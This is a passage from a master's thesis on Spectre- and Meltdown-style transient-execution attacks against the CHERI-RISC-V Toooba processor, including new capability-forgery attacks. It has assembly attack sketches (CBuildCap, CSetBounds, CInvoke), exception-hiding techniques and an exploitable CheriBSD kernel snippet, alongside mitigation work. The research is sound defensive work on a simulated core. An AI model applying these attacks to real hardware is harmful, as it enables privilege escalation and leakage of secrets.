    cld t2, 0(ct0)
    // load again from another capability with offset
    cincoffset ct1, ct1, t2
    cld t2, 0(ct1)

Figure 5.6: Reproduction of the Meltdown-US attack tailored to CHERI capabilities.

5.2.2 Meltdown-GP-CHERI

The Meltdown-GP attack – presented in Section 4.2.2 – and the Meltdown-GP-CHERI attack have large similarities. Both attacks seek to read a register that the code has no permission to read. In my Meltdown-GP-CHERI example, the attacker wants to access the SCR mscratchc, which cannot be accessed if the current PCC does not have the ASR bit set; this is the case in my setup for this attack. The access is followed by a load to an attacker-accessible array in order to make the secret visible. Meltdown-GP-CHERI is therefore a variant of Meltdown-GP tailored to CHERI systems, as they offer the ASR functionality that conventional RISC-V systems lack. However, as marked in Table 5.3, this attack is not possible on CHERI-RISC-V Toooba. Similar to the description in Section 4.2.2, checking whether the ASR bit is set is done as part of the Rename stage in Toooba. This leads to the instruction being marked as executed in the ROB entry, which means that it never enters the ALU pipeline. Therefore, the result will never be produced, which mitigates the attack, as the following transient-instruction sequence cannot reveal the secret register value.
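For illustration, the attempted access has roughly the following shape; the register names are assumptions of mine and this is a minimal sketch rather than the exact code used in my experiment.

melt_gp_cheri:
    // read an SCR without the ASR permission in PCC – architecturally this traps
    cspecialr ct0, mscratchc
    // intended transient sequence: turn the register value into a cache footprint
    cgetaddr  t0, ct0
    cincoffset ct1, ct1, t0
    cld       t0, 0(ct1)

On Toooba this sequence never leaks anything, because the check in the Rename stage prevents the result of the cspecialr read from ever being produced.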

5.2.3 Meltdown-CF

Meltdown-CF (Capability Forgery) is a new subclass of transient-execution attacks that was developed in this master's thesis work. The goal of all attacks in this subclass is the same: forging, in speculation, a capability to memory that the attacker should not have access to, and using it to leak secrets. Meltdown-CF attacks therefore pose a large threat to CHERI systems. All attacks in the Meltdown-CF class are inspired by Jonathan Woodruff and members of the CHERI team, who suspected a vulnerability in CHERI-RISC-V Toooba and encouraged me to attempt these exploits.

CBuildCap

The CBuildCap instruction has been added to CHERI-RISC-V in order to increase performance when importing capabilities. CBuildCap attempts to build a capability from a bit pattern. The instruction has three operands: the bit pattern stored in a capability register, an authorising capability stored in another capability register, and the destination capability register. The bit pattern does not need to be tagged, but it must not represent an escalation of privilege beyond the authorising capability. If this invariant is broken, an exception will be raised [37]. The CBuildCap instruction can be logically split into two sub-operations. First, the capability checks have to be conducted. Second, if the capability checks were successful, the input capability bit pattern is tagged – thereby becoming a valid capability – and written to the destination register.

The main part of the attack code is depicted in Figure 5.7. This code is expected to run in an attacker-controlled compartment whose PCC is limited to certain addresses. In this scenario, the attacker can be a user who acts as an adversary on a CHERI system. The goal of the attacker is to speculatively craft a powerful capability in order to read secrets of other compartments. The register a0 holds the index used to access the speculatively created capability and ca1 holds the bit pattern to be used with CBuildCap. The index is shifted logically left by four bits in order to address 16-byte memory chunks. The attack is designed such that the load following the shift instruction misses all caches and therefore incurs the maximum load penalty possible. The CBuildCap instruction is not dependent on the previous instructions and can be executed out of order before the load finishes. In fact, none of the instructions following the load depend on it. Therefore, all of these instructions can be executed before the slow load finishes, but none of them can commit before the load commits. The CBuildCap instruction has cs1 as its authorising capability, which is derived from DDC but limited to the addresses [0x80001000 − 0x80002000]; in my example, this is the most powerful data capability the attacker has access to. The bit pattern passed in ca1 is the almighty capability spanning the entire address space, with the tag bit stripped. However, this breaks the invariant that the authorising capability must be at least as powerful as the bit pattern. The CBuildCap instruction will therefore fail, but for now we assume that it does not and that all subsequent instructions are executed normally. Next, the attack uses the index calculated before and adds it to the capability address. This is the address of the secret value, which is loaded in the next instruction. This secret value is used as an index into a user-accessible array whose base address is in cs7.

access_funct:
    // a0: index to 16 byte chunks
    // ca1: bit pattern for capability to be built
    slli a0, a0, 4
    // misses all caches and produces
    // maximum miss penalty
    cld t1, 0(cs1)
    // will raise an exception, but before
    // that it will reveal the secret
    cbuildcap ct2, cs1, ca1
    cincoffset ct2, ct2, a0
    // load twice to reveal secret
    cld t0, 0(ct2)
    cincoffset cs7, cs7, t0
    cld t0, 0(cs7)
    cret

Figure 5.7: Overview of the CBuildCap attack code.

The load to this address reveals the secret to the attacker, as they can probe the user-accessible array later in order to find out the secret value. Toooba's ALU has four pipeline stages: dispatching the instruction to the ALU, reading the register values, performing the actual operation, and writing back the calculated value. Toooba reverses the order of the sub-operations of CBuildCap in order to improve performance. It first tags the input data and then performs the capability checks, which are called CapMod and CapCheck in Figure 5.8. This means that, in the actual execute stage, there exists a tagged capability that has not yet been checked. In the next stage, the writeback stage called FinishALU in Figure 5.8, Toooba performs the actual checks and finishes the execution of CBuildCap by marking it as executed in the ROB. This also sets a field in the ROB indicating that the instruction raised an exception. In order to improve performance, Toooba forwards ALU results to subsequent operations. In general, forwarding avoids stall cycles that would otherwise be introduced by writing the result to the register file and making other operations wait to read this value. Toooba uses forwarding in both the ExeALU and the FinishALU stage, in addition to writing the data to the register file in the FinishALU stage. For my attack, this means that the powerful tagged capability will be forwarded to subsequent instructions that use the result of the CBuildCap instruction.


Figure 5.8: The last two stages of the Toooba ALU pipeline, which forward modified capabilities before performing capability checks. This figure is borrowed from the CHERI team.

An instruction commits when it is at the head of the ROB. Toooba raises exceptions at the commit phase, because only at this point is it certain that the exception really occurred; it could otherwise have come from a speculative execution path that should not have been taken. In the meantime, the speculatively crafted almighty capability can be freely used to access the entire memory space, e.g., to read secret memory of other compartments. This is possible because – like many other processors – Toooba does not stall its pipeline in case of a speculative hardware exception, in order to increase performance.

The attack – as depicted in Figure 5.7 – will cause the operating system to react to the hardware exception being raised. This will lead to the termination of the process running this code, which can be disadvantageous for the attacker for two reasons. First, the attacker often wants to conduct the attack multiple times and therefore wants to keep the victim process running. Second, the exception will entail a call to the operating system's exception handler, which will perform load operations itself and therefore might cause a lot of noise from the attacker's point of view.

As described in [27], an attacker has multiple options to hide the exception. One option is to fork a child process and execute the attack code there. This solves the problem of keeping the actual attack process open, but the child process will still trigger the invocation of the exception handler and potentially make the results useless because of noise. Another option is to hide the CBuildCap instruction and the transiently executed instruction sequence in a speculative frame. This means that I insert a branch instruction before the CBuildCap instruction with a branch target that lies after the second transient load. The branch instruction needs to be slow to resolve for Toooba, which can be achieved by making it dependent on a load that misses all caches. I train the branch so that the attack code path is always predicted to be taken, as explained in Section 5.1.1. During the actual attack, I provide parameters such that the attack code path is eventually not taken. Therefore, the attack code is still executed speculatively, but the exception is hidden by the rollback that Toooba eventually performs. This step combines the CBuildCap attack with a Spectre-PHT attack, as suggested by Lipp et al. [27]. It solves both keeping the process open and avoiding the invocation of the exception handler, because the exception never occurs on the architectural level. One drawback is that the effective speculation window for the attacker becomes smaller due to an extra instruction that has to be executed before the actual attack code. However, this proved to be no problem in Toooba and I have successfully crafted this variant of the CBuildCap attack; a sketch of it is given at the end of this subsection.

Another mechanism proposed in [27] is the use of transactional memory. If a failure occurs in a sequence of memory accesses that the architecture has made transactional, all operations in that transaction will be rolled back. However, effects on the cache might have already taken place and secrets can therefore be leaked. RISC-V mentions a Standard Extension for Transactional Memory; however, this has not been specified yet [11]. Therefore, it cannot be used on RISC-V architectures to hide an exception.
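Returning to the speculative-frame variant, it can be sketched as follows; the training of the branch and the later probing phase are omitted, and the register names are illustrative assumptions based on Figure 5.7 rather than the exact code I used.

    // branch depends on a slow load, so it resolves late; trained to fall through
    cld        t3, 0(cs2)        // misses all caches
    bnez       t3, after_attack  // resolves taken in the real run, squashing everything below
    cbuildcap  ct2, cs1, ca1     // forged capability; the exception is now only ever transient
    cincoffset ct2, ct2, a0
    cld        t0, 0(ct2)        // transient load of the secret
    cincoffset cs7, cs7, t0
    cld        t0, 0(cs7)        // revealing load into the attacker-probed array
after_attack:
    cret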

CSetBounds

This attack is comparable to the CBuildCap attack presented above. The goal of the attack is to extend the bounds of a capability, which breaks the monotonicity constraint of CHERI capabilities. The CSetBounds instruction sets the bounds of a capability while ensuring monotonicity: if the new bounds would exceed the current bounds, an exception is raised [37]. The attack is performed the same way the CBuildCap attack was performed. A load that misses all caches – or any instruction that introduces a sufficiently long delay – enables the transient-execution sequence to take effect before the exception caused by the CSetBounds instruction is raised. The transient-execution sequence comprises the following steps: setting the address to a value of interest to the attacker, accessing that value, and finally accessing an attacker-visible array with the secret as the index in order to leak the secret.
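A sketch of this sequence, under the same assumptions as Figure 5.7 and with cs3 and t4 as assumed, illustrative operands (the capability whose bounds are widened and the requested, too-large length), could look as follows; it is not the verbatim attack code.

    cld        t1, 0(cs1)        // slow load that delays the exception
    csetbounds ct2, cs3, t4      // t4 requests bounds larger than those of cs3 – traps at commit
    cincoffset ct2, ct2, a0      // transiently forwarded, widened capability
    cld        t0, 0(ct2)        // transient load of the secret
    cincoffset cs7, cs7, t0
    cld        t0, 0(cs7)        // revealing load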

Analogous to the CBuildCap attack, the CSetBounds attack will raise an exception in the form presented above. As explained, hiding the exception in a speculative frame is the best option for an attacker. I have successfully implemented both a variant that eventually raises a hardware exception and a variant that hides the exception.

CInvoke

Both the CBuildCap and the CSetBounds attack operate on conventional unsealed data capabilities. In contrast, this attack works on sealed capabilities. Sealed capabilities cannot be dereferenced and thus are not of great use to an attacker. Therefore, it is the attacker's goal to unseal such a data capability and access the memory addresses it grants access to. Since sealed capabilities cannot be dereferenced, it is deemed secure to pass them to non-trustworthy processes. This way, an attacker can get access to a sealed data capability. The CInvoke instruction was designed to allow fast jumps between protection domains. This is enabled by having a sealed code capability to the code the user wants to jump to and a sealed data capability – these two capabilities together form a capability pair. CInvoke unseals the code capability and jumps to it. Furthermore, it unseals the data capability and moves it into a general-purpose capability register. In order to be considered a valid operation, CInvoke needs to pass many checks, e.g., both capabilities need to be tagged and sealed. In my scenario, I primarily attack the requirement that the capability pair must have the same otype; however, I violate multiple other invariants as well [37]. A failure of these checks leads to an exception being raised by Toooba. My approach for the attack is to use a code capability that points to a gadget in the attacker's code space. For the data capability, I use a powerful sealed capability for which the attacker does not have a suitably authorising capability to unseal it. The CInvoke instruction is executed with these two capabilities as parameters. In order to delay the exception being raised, a load missing all caches is used again. With the exception delayed, the code speculatively jumps to the attacker's chosen gadget and the data capability is unsealed and forwarded. The gadget loads the secret and reveals it through a second transient load. Hiding the exception in a speculative frame is again the best way of conducting this exploit from an attacker's perspective.
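The following sketch shows the shape of this attack; cs3 and cs4 stand for the sealed code and data capabilities, the gadget placement is simplified, and the use of ct6 for the unsealed data capability reflects my reading of the CInvoke convention – this is an illustrative sketch, not the verbatim thesis code.

    cld     t1, 0(cs1)       // slow load that delays the exception
    cinvoke cs3, cs4         // sealed pair with mismatching otypes – traps at commit, but the
                             //     jump and the unsealing still happen speculatively
gadget:
    cld     t0, 0(ct6)       // ct6 holds the speculatively unsealed data capability
    cincoffset cs7, cs7, t0
    cld     t0, 0(cs7)       // revealing load into the attacker-probed array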

CUnseal

Similar to the attack above, the goal of this attack is to unseal a capability without having the necessary privileges. The CUnseal instruction requires two parameters: the capability to be unsealed and the capability authorising this. If the CUnseal instruction fails, a hardware exception is raised. There are multiple reasons why CUnseal can fail – in my attack I focus on a TypeViolation, which is caused if the otype of the sealed capability is not equal to the address of the authorising capability [37]. Again, in my attack scenario, the attacker has already obtained a powerful sealed data capability or can obtain one when needed, e.g., by reading from memory shared with another process running on the CHERI system. The actual attack approach is similar to the CInvoke attack. The attacker does not possess a suitable capability that allows unsealing the powerful data capability. In order to delay the exception being raised, the attacker performs a load with a large miss penalty. Toooba's forwarding again enables a transient-execution sequence to make a secret visible to the attacker. If an attacker wants to conduct the attack more than once, hiding the exception in a speculative execution frame is the best solution.

Chapter 6

Discussion

One of the main goals of this thesis work is to contribute a platform to foster research on transient-execution attacks on both RISC-V and CHERI-RISC-V processors. The experiments presented in Chapters 4 and 5 show that vulnerabilities are present in Toooba and that mitigation mechanisms need to be developed and deployed. In this chapter, I describe how my framework impacted the CHERI team and helped to develop and improve SinglePCC – a mitigation mechanism against Spectre-style attacks in CHERI-RISC-V Toooba. Furthermore, my work has triggered initial plans for Meltdown-CF mitigation.

6.1 SinglePCC

The SinglePCC mechanism has mainly been developed by Jonathan Woodruff and was inspired by my experiments and their results, as all Spectre-style attacks were found to violate CHERI's security model.

6.1.1 Mechanism

As of now, CHERI-RISC-V Toooba uses the entire PCC of the target for branch prediction, which means that both the actual address and the privileges, including the bounds, are predicted. SinglePCC removes the privileges completely from the prediction. In order to determine whether an instruction is in bounds, it uses the PCC bounds of the last committed instruction. Whenever an instruction that changes the bounds, e.g., a cjalr instruction, is executed, the bounds are updated as well. The BTB and RSB now carry only the address and no longer any bounds or other privileges. If the address of an instruction is out of the current bounds, e.g., the target of a jump to another compartment, the instruction has to wait until its bounds can be derived from the current register state without speculation. This approach will decrease overall system performance, as additional pipeline flushes can be introduced by waiting for the bounds to be available in the register state, but it does not allow any speculation over compartment boundaries.

6.1.2 Testing SinglePCC

I ran all major Spectre-style attacks on the branch of Toooba that has been extended with SinglePCC. The results are summarised in Table 6.1. SinglePCC successfully mitigates attacks that inject into the BTB or RSB an address that is out of bounds of the PCC of the respective compartment or part of the code, e.g., a function whose PCC is limited exactly to its own code. A jump to another compartment is possible – but not in speculation. This means that the attacker-chosen gadget will never be executed. However, SinglePCC does not mitigate the following attack case: consider two identical compartments that differ only in having different ASIDs. Furthermore, one compartment is under the control of the attacker and the other compartment is benign. The compartment under attacker control can inject an entry into the BTB or RSB, and when the benign compartment is executed the next time, it will follow the misprediction. Capabilities describe virtual addresses, but do not contain any information about address spaces. SinglePCC mandates that the address in speculation must be in the current bounds, but this does not forbid this case of cross-protection-domain training, because SinglePCC does not know about the different address spaces.

Furthermore, SinglePCC mitigates neither Spectre-PHT nor Spectre-STL-Load. In the case of Spectre-PHT, the attacker only mistrains the branch prediction direction, but both the taken and the not-taken target are in the current bounds, which means that SinglePCC does not take effect here. For Spectre-STL-Load, the reason is similar: this attack loads a stale memory value, but it does not affect branch targets and therefore the address always stays within the current bounds. However, SinglePCC mitigates Spectre-STL-Jump if the jump goes out of bounds, for the same reasons that SinglePCC mitigates Spectre-BTB and Spectre-RSB. Last, SinglePCC only mitigates attacks that involve jumping. Therefore, SinglePCC does not mitigate any of the Meltdown-CF attacks.

With SinglePCC enabled, an attacker cannot train the BTB with targets outside of the bounds of the current PCC. However, the attacker can train the BTB with targets in bounds. If the current bounds are not tight, this gives the attacker a higher probability of finding a suitable gadget in the victim's code.

                     asm    CHERI asm
Spectre-PHT           ✓         ✓
Spectre-BTB           ✓         ✗
Spectre-RSB           ✓         ✗
Spectre-STL-Load      ✓         ✓
Spectre-STL-Jump      ✓         ✗

Table 6.1: Overview of attempted Spectre-style attacks and whether they were successful when SinglePCC is applied.

6.1.3 Hardening SinglePCC

Running the Spectre-style transient-execution attacks on Toooba with SinglePCC enabled revealed a dangerous vulnerability in the initial SinglePCC implementation. My example of Spectre-RSB worked even though the return address injected into the RSB was out of bounds of the current PCC of the victim. In collaboration with Jonathan Woodruff, this could be traced back to an error in the microarchitecture. In my example, the victim PCC starts at address 0x80040000, whereas the attacker PCC starts at address

0x80080000. The entire PCCs of the victim (PCCv) and the attacker (PCCa) are:

PCCv = 0xffff200000018004_0000000080040000    (6.1)

PCCa = 0xffff200000018004_0000000080080000    (6.2)

In order to understand the error in the microarchitecture, I need to explain CHERI Concentrate [38] – the compression mechanism used to achieve 128-bit capabilities. As depicted in Figure 6.1, CHERI Concentrate divides the memory space into three different parts from the view of one capability: the unrepresentable region, the representable space, and the dereferenceable region. In the erroneous SinglePCC implementation, Toooba pulled the address from the RSB and then applied a function that adds the bounds of the current PCC. In order to improve overall performance – to shorten the critical path


Figure 6.1: Memory regions implied by the CHERI Concentrate encoding. Taken and adapted from Woodruff et al. [38].

– the implementors used a function that sets the address but does not check whether the address is representable. This function is unsafe, but superior to its safe counterpart in terms of performance. Because of the alignment of the victim and attacker PCCs, they have the same encoding through CHERI Concentrate. PCCv and PCCa differ only in the actual address, and the compressed bounds bits are identical. In general, CHERI Concentrate can encode the bounds of multiple memory regions with the same bit pattern – all these capabilities differ only in the actual address. The unsafe address update means that the attacker address pulled from the RSB is considered in bounds. Therefore, the bounds check following the address-setting function does not fail, Toooba speculatively jumps to the attacker's gadget, and the entire attack succeeds.

My findings caused the SinglePCC implementation to be reviewed and changed accordingly. A more costly but safe function for setting the address coming from the RSB is used in the current design. This function checks whether the address is in the unrepresentable region, which in my attack case causes the function to strip the capability's tag bit. In turn, this invalid capability will not pass the bounds checks and therefore Toooba will not speculatively jump to this address – as it is intended to work. Later, Woodruff implemented another approach that decodes the bounds of the current PCC and writes them to hardware registers. These bounds are then used for comparison against addresses coming from the BTB and RSB. The bounds registers only change in case of an architecturally taken jump.

ld   a0, 1000(s5)
ld   a1, 208(a0)
add  a0, zero, s1
jalr ra, a1

Figure 6.2: CheriBSD kernel code that is suitable for a Spectre-BTB attack.

6.1.4 Spectre-BTB in Kernel Code

In order to confirm the need for mechanisms that mitigate Spectre-style attacks, I present a possible vulnerability that would allow an attacker to bypass CHERI's security measures in a real-world environment. In this section, I describe a possible attack on a CHERI system using the presence of an operating system – in this case CheriBSD. In this attack scenario, I use the hybrid-kernel version of CheriBSD, which means that the kernel itself does not use capabilities for its code and data, but the kernel fully enables user-space programs to do so. In Figure 6.2, I show a short snippet of the CheriBSD kernel code for handling exceptions. Note that this code is not CHERI-RISC-V assembly but conventional RISC-V assembly, because the kernel itself does not use capabilities. The code is part of the syscallenter function, which is indirectly called by the do_trap_user function – the function that handles exceptions coming from U privilege mode. The code depicted in Figure 6.2 fulfils all the criteria to be exploitable by a Spectre-BTB attack. As described in Section 5.1.3, the goal of the attacker is to alias an indirect jump, which in this example is jalr ra, a1. Furthermore, the attacker has to ensure that the load operation writing into a1 is delayed, e.g., by making it miss all caches. This will lead to a misspeculation to the attacker's gadget that has previously been injected into the BTB.

This kind of attack is a large threat to CHERI systems, as it gives attackers powerful capabilities normally used by the kernel. The attacker could attempt to find a powerful capability, e.g., one derived from an SCR or a CSR, that is still in the register state from previous function calls. However, the fact that the kernel is not using capabilities gives the attacker another option to conduct impactful attacks. For memory operations not issued through capabilities, CHERI systems implicitly use the DDC register. In order to satisfy the wide range of memory accesses performed by the kernel, the capability in DDC has to be configured to be suitably powerful. In case of an attack, the DDC register can be used by attackers as well and gives them plenty of options to attack CheriBSD's kernel through Spectre-BTB attacks.

As presented in Section 6.1.2, SinglePCC will mitigate attacks that are based on Toooba misspeculating to another compartment. In order to successfully mitigate the attack above, SinglePCC requires the bounds of the kernel PCC to be tight. If this is not the case, SinglePCC will not mitigate this attack, as no out-of-bounds jump will be detected. Therefore, this example again illustrates how important it is for the overall security of a CHERI system that it is configured according to the principle of least privilege. Furthermore, it shows the importance of the framework I created during my work.

6.2 Preventing Meltdown-CF

The Meltdown-CF attacks explained in Section 5.2.3 pose a large threat to CHERI systems. The analysis presented in this work inspired CHERI hardware designers to propose solutions that are outlined in the following paragraphs. All Meltdown-style attacks are caused by exceptions not being raised at the right point in time in the pipeline, which leads to illegal data being forwarded and used in transient-execution sequences. As explained in Section 2.4.5, CHERI implementations need to prevent Meltdown-CF attacks. This can be done both architecturally and microarchitecturally.

Jonathan Woodruff and Peter Rugg proposed in several personal meetings that the ISA could be changed such that instructions in the Meltdown-CF subclass no longer throw hardware exceptions, but instead forward invalid capabilities in case of a failure. This would entirely prevent transient execution from taking effect, as memory operations through invalid capabilities are not allowed and lead to a hardware exception in Toooba.

Furthermore, Woodruff and Rugg presented the idea of changing only the microarchitecture, without adjusting the ISA. They propose not to write any capability to the physical register file that exceeds the privileges of its operands, even if it is only used on a transient path. This prevents any privilege escalation. Both approaches have a common denominator: the capability checks need to be resolved before any value is written to the physical register file. Woodruff and Rugg further state that this will not have a performance impact on CUnseal and CInvoke, but that it will cost performance for the CBuildCap and CSetBounds instructions due to capability compression being on the critical path.

6.3 Ethics and Sustainability

When conducting attacks for scientific reasons, it has to be ensured both that no harm is done to real-world systems and that the attack is responsibly disclosed. Responsible disclosure means that the researchers wait a period of time before disclosing the vulnerability such that affected systems have enough time to take measures. Publications about transient-execution attacks have followed these principles from the beginning [22, 27]. I complied with these principles throughout my thesis work as well. Whilst performing my attacks, I only operated on a simulation running on a server and therefore did no harm to any real-world system. Toooba is a research processor in development whose purpose is to enable security research. Therefore, I can disclose the found vulnerabilities immediately with the publication of this thesis.

One goal of this thesis was to provide a platform for further research on these attacks. Another goal was to show the possibility of transient-execution attacks. As described in previous sections of this chapter, my research has led to initial mitigation mechanisms being put in place in Toooba. This will inspire hardware designers to develop more sophisticated mitigation mechanisms that will strengthen CHERI's security claims. The computer science community is now aware that transient-execution attacks affect many microarchitectures and that mitigation mechanisms are crucial.

A point often overlooked is sustainability. Modern computing can help to use resources sustainably, e.g., in smart irrigation systems. However, all such systems need computing power in order to make decisions that benefit sustainability. My research will lead to CHERI systems becoming more secure. CHERI's strong security claims will remove concerns about security and therefore foster the use of CHERI in sustainable systems.

6.4 Future Work

This thesis work answered the question of whether transient-execution attacks are possible on Toooba and on CHERI systems in general. However, many questions remain unanswered – especially regarding more advanced transient-execution attacks running in a real-world environment. Currently, Toooba is fairly conservative and is not yet instantiated in a multi-core setup. This effectively mitigates advanced transient-execution attacks, but also significantly limits performance. Changes on a per-core basis, e.g., adding sophisticated data-value speculation to the processor, will enrich the microarchitectural state,

which will give an attacker plenty of options to attempt transient-execution attacks on a RISC-V or CHERI-RISC-V system. This means that future work will aim to improve Toooba's performance and evaluate whether a richer microarchitectural state leads to the possibility of sophisticated transient-execution attacks.

It is not yet clear how CHERI capabilities interact with transient-execution attacks. In most cases, capabilities are an obstacle for an attacker, but they can be an advantage as well. Considering a single-address-space operating system as proposed in [37], speculative bounds escalation can pose a large threat to CHERI systems, as the CBuildCap attack example has shown. It has to be researched whether there exist other ways to escalate privilege in speculation. Furthermore, other interactions in a full operating system environment are of interest to the attacker, e.g., achieving longer load miss penalties by creating TLB misses. Besides the feasibility of an attack, the quality of possible attacks has to be investigated. CHERI-RISC-V systems differ in instruction sequences from conventional RISC-V systems and are likely to introduce noise, e.g., capabilities have to be loaded from a capability table first. These loads can affect cache traces and therefore can change the transmission rates in real-world attacks.

In general, my work has looked at Toooba only in simulation through Verilator. An instance of Toooba synthesised to a Field Programmable Gate Array (FPGA) will bring new insights and make the results more robust. Furthermore, it would be interesting to conduct research on transient-execution attacks on the ARM Morello architecture [49]. The different design choices and the different underlying ISA will likely have an impact on which attacks are successful and what their respective quality is.

Chapter 7

Conclusions

In this work, I performed initial research on transient-execution attacks on the superscalar out-of-order CHERI-RISC-V microprocessor Toooba. I can clearly answer the question of whether Toooba is vulnerable to transient-execution attacks in the affirmative. In both RISC-V and CHERI-RISC-V assembly, I could successfully conduct transient-execution attacks. This work was the first to completely reproduce the major transient-execution attacks on a RISC-V processor and the first to attempt attacks of this class against CHERI capability protection. I find that transient-execution attacks violate CHERI's security model in two ways and therefore require mitigation and prevention mechanisms to be put into place. First, control flow can be hijacked through Spectre-BTB and Spectre-RSB, allowing attackers to direct control to their chosen gadgets in speculation. Second, Meltdown-Capability-Forgery poses a large vulnerability, as attackers can transiently escalate privilege. I showed that both subclasses of transient-execution attacks pose a large threat to code running on Toooba. I believe that both attack classes can be prevented or mitigated by security mechanisms currently being developed. However, I believe that further findings have yet to be made about transient-execution attacks on CHERI-RISC-V microprocessors. I further think that transient-execution attacks will significantly impact threat models and hardware design of any microarchitecture in the future, and especially of capability systems, as they promise strong security guarantees. This work builds the basis for advanced research on transient-execution attacks on RISC-V microprocessors. Furthermore, it sets the stage for a first generation of commercial CHERI microprocessors to ensure that CHERI's strong architectural guarantees are also non-bypassable in speculation.

Bibliography

[1] The MITRE Corporation. CVE-2014-0160. https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160. 2013.
[2] Trevor Jim et al. “Cyclone: A Safe Dialect of C”. In: Proceedings of the General Track of the Annual Conference on USENIX Annual Technical Conference. ATEC ’02. USA: USENIX Association, June 2002, pp. 275–288. isbn: 1880446006.
[3] George C. Necula, Scott McPeak, and Westley Weimer. “CCured: Type-Safe Retrofitting of Legacy Code”. In: Proceedings of the 29th ACM SIGPLAN-SIGACT Symposium on Principles of Programming Languages. POPL ’02. Portland, Oregon: Association for Computing Machinery, Jan. 2002, pp. 128–139.
[4] Archibald Samuel Elliott et al. “Checked C: Making C Safe by Extension”. In: 2018 IEEE Cybersecurity Development (SecDev). Cambridge, MA, USA, Sept. 2018, pp. 53–60.
[5] Thomas Bourgeat et al. “MI6: Secure Enclaves in a Speculative Out-of-Order Processor”. In: Proceedings of the 52nd Annual IEEE/ACM International Symposium on Microarchitecture. MICRO ’52. Columbus, OH, USA: Association for Computing Machinery, Oct. 2019, pp. 42–56.
[6] Marno van der Maas and Simon W. Moore. “Protecting Enclaves from Intra-Core Side-Channel Attacks through Physical Isolation”. In: Proceedings of the 2nd Workshop on Cyber-Security Arms Race. CYSARM’20. Virtual Event, USA: Association for Computing Machinery, Nov. 2020, pp. 1–12.
[7] Maurice V. Wilkes and Roger M. Needham. The Cambridge CAP Computer and Its Operating System. Elsevier, Jan. 1979.


[8] William B. Ackerman and William W. Plummer. “An implementation of a computer system”. In: SOSP ’67: Proceedings of the First ACM Symposium on Operating System Principles. New York, NY, USA: ACM, 1967, pp. 5.1–5.10.
[9] Dmitry Evtyushkin et al. “BranchScope: A New Side-Channel Attack on Directional Branch Predictor”. In: Proceedings of the Twenty-Third International Conference on Architectural Support for Programming Languages and Operating Systems. ASPLOS ’18. Williamsburg, VA, USA: Association for Computing Machinery, Mar. 2018, pp. 693–707.
[10] Krste Asanović and David A. Patterson. Instruction Sets Should Be Free: The Case For RISC-V. Tech. rep. UCB/EECS-2014-146. University of California at Berkeley, Electrical Engineering and Computer Sciences, Aug. 2014.
[11] Andrew Waterman and Krste Asanović, editors. The RISC-V Instruction Set Manual. Document Version 20191213. Volume I: User-Level ISA. RISC-V Foundation. Dec. 2019.
[12] Andrew Waterman and Krste Asanović, editors. The RISC-V Instruction Set Manual. Document Version 20190608-Priv-MSU-Ratified. Volume II: Privileged Architecture. RISC-V Foundation. June 2019.
[13] Robert M. Tomasulo. “An Efficient Algorithm for Exploiting Multiple Arithmetic Units”. In: IBM Journal of Research and Development 11.1 (1967), pp. 25–33.
[14] David A. Patterson and John L. Hennessy. Computer Organization and Design, RISC-V Edition: The Hardware/Software Interface. San Francisco, CA, USA: Morgan Kaufmann Publishers Inc., 2017. isbn: 9780128122754.
[15] John L. Hennessy and David A. Patterson. Computer Architecture: A Quantitative Approach. 6th. San Francisco, CA, USA: Morgan Kaufmann Publishers Inc., 2017. isbn: 9780128119068.
[16] David M. Gallagher et al. “Dynamic Memory Disambiguation Using the Memory Conflict Buffer”. In: Conference on Architectural Support for Programming Languages and Operating Systems. San Jose, CA, USA, Oct. 1994.
[17] Martin Schwarzl et al. Speculative Dereferencing of Registers: Reviving Foreshadow. Aug. 2020. arXiv: 2008.02307.

[18] Yuval Yarom and Katrina Falkner. “FLUSH+RELOAD: A High Resolution, Low Noise, L3 Cache Side-Channel Attack”. In: USENIX Security Symposium. San Diego, CA: USENIX Association, Aug. 2014, pp. 719–732.
[19] Claudio Canella et al. “A Systematic Evaluation of Transient Execution Attacks and Defenses”. In: Proceedings of the 28th USENIX Conference on Security Symposium. SEC’19. Santa Clara, CA, USA: USENIX Association, Aug. 2019, pp. 249–266.
[20] Jo Van Bulck et al. “LVI: Hijacking Transient Execution through Microarchitectural Load Value Injection”. In: 2020 IEEE Symposium on Security and Privacy (SP). San Francisco, CA, USA, 2020, pp. 54–72.
[21] Robert N. M. Watson et al. Capability Hardware Enhanced RISC Instructions (CHERI): Notes on the Meltdown and Spectre Attacks. Tech. rep. UCAM-CL-TR-916. University of Cambridge, Computer Laboratory, Feb. 2018. url: https://www.cl.cam.ac.uk/techreports/UCAM-CL-TR-916.pdf.
[22] Paul Kocher et al. “Spectre Attacks: Exploiting Speculative Execution”. In: IEEE Symposium on Security and Privacy. San Francisco, CA, USA, May 2019.
[23] Esmaeil Mohammadian Koruyeh et al. “Spectre Returns! Speculation Attacks Using the Return Stack Buffer”. In: Proceedings of the 12th USENIX Conference on Offensive Technologies. WOOT’18. Baltimore, MD, USA: USENIX Association, Aug. 2018.
[24] Giorgi Maisuradze and Christian Rossow. “Ret2spec: Speculative Execution Using Return Stack Buffers”. In: Proceedings of the 2018 ACM SIGSAC Conference on Computer and Communications Security. CCS ’18. Toronto, Canada: Association for Computing Machinery, Jan. 2018, pp. 2109–2122.
[25] Jann Horn. speculative execution, variant 4: speculative store bypass. https://bugs.chromium.org/p/project-zero/issues/detail?id=1528. Feb. 2018.
[26] Stephan Van Schaik et al. “RIDL: Rogue In-Flight Data Load”. In: IEEE Symposium on Security and Privacy. San Francisco, CA, USA, May 2019.
[27] Moritz Lipp et al. “Meltdown: Reading Kernel Memory from User Space”. In: Commun. ACM (May 2020), pp. 46–56.

[28] Jo Van Bulck et al. “Foreshadow: Extracting the Keys to the Intel SGX Kingdom with Transient Out-of-Order Execution”. In: 27th USENIX Security Symposium (USENIX Security 18). Baltimore, MD: USENIX Association, pp. 991–1008.
[29] Intel Corporation. Intel® Software Guard Extensions Developer Guide. https://software.intel.com/content/www/us/en/develop/documentation/sgx-developer-guide/top.html. Sept. 2016.
[30] Intel Corporation. Deep Dive: Intel Analysis of L1 Terminal Fault. Tech. rep. 2018. url: https://software.intel.com/security-software-guidance/advisory-guidance/l1-terminal-fault.
[31] Ofir Weisse et al. Foreshadow-NG: Breaking the Virtual Memory Abstraction with Transient Out-of-Order Execution. Tech. rep. 1.0. Aug. 2018, p. 7. url: https://foreshadowattack.eu/foreshadow-NG.pdf.
[32] Arm Limited. Cache Speculation Side-channels. Tech. rep. 2.5. 2020, p. 21. url: https://developer.arm.com/support/arm-security-updates/speculative-processor-vulnerability.
